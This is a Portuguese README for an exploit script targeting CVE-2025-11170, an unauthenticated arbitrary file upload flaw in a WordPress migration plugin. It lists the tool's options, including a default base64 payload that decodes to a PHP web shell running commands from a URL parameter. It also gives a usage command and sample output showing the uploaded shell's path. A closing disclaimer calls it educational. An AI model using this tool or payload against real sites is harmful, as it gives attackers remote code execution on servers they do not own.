
Plugin dedicado à migração do WP for CPI <= 1.0.2 - Upload Arbitrário de Arquivo Não Autenticado
WP移行専用プラグイン for CPI <= 1.0.2 - Upload de Arquivo Arbitrário não Autenticado
O plugin WP移行専用プラグイン for CPI para WordPress é vulnerável a uploads de arquivos arbitrários devido à falta de validação de tipo de arquivo na função Cpiwm_Import_Controller::import em todas as versões até, e incluindo, a 1.0.2.
Isso permite que atacantes não autenticados realizem upload de arquivos arbitrários no servidor do site afetado, possibilitando potencialmente a execução remota de código.
CVE-2025-11170.py| Argumento | Descrição |
|---|---|
-u, --url | URL base do alvo (ex.: http://target.com/wordpress/). O script anexa wp-admin/admin-ajax.php automaticamente. |
-f, --filename | Nome do shell ou arquivo para fazer upload. Padrão: shell.php |
-d, --data | Conteúdo do arquivo em base64 (ou texto puro). Padrão: PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+ |
-i, --index | Valor do campo index. Padrão: 0 |
-H, --headers | Cabeçalhos HTTP extras (formato: X-Key:Value;K2:Value2) |
-t, --timeout | Tempo limite para requisição HTTP (segundos). Padrão: 10 |
--retries | Número de tentativas de repetição. Padrão: 3 |
--backoff | Fator de espera entre tentativas (segundos). Padrão: 0.7 |
-v, --verbose | Aumentar verbosidade para depuração (repetível) |
Nxploited_parse_args
Analisa e valida os argumentos de entrada. Garante a estrutura correta do endpoint, cabeçalhos e codificação dos dados.
Nxploited_logging
Configura logs avançados e verbosidade para uma saída detalhada ou mínima em tempo de execução.
Nxploited_retry_session
Inicializa uma sessão persistente com lógica de repetição e backoff para comunicações resilientes.
Nxploited_build_payload
Constrói os parâmetros da requisição POST para exploração.
Nxploited_send
Executa a requisição POST ao endpoint vulnerável e gerencia respostas/erros.
Nxploited_output_result
Processa e formata a resposta, exibindo o caminho do shell em caso de sucesso, ou informações de depuração caso contrário.
python3 CVE-2025-11170.py -u "http://192.168.100.74:888/wordpress/" -f "shell.php"
Exemplo de Saída:
Uploading shell...
Processing response...
[+] Upload successful!
Shell path:
http://192.168.100.74:888/wordpress/wp-content/plugins/cpi-wp-migration/storage/shell.php
Nxploited
My GitHub: https://github.com/Nxploited
Este script é fornecido apenas para fins educacionais.
O uso deste exploit em alvos sem a devida autorização pode ser ilegal.
O autor NÃO assume responsabilidade por qualquer uso indevido, danos ou consequências legais.
GitHub: Nxploited
Telegram: KNxploited
Por: Nxploited ( Khaled Alenazi )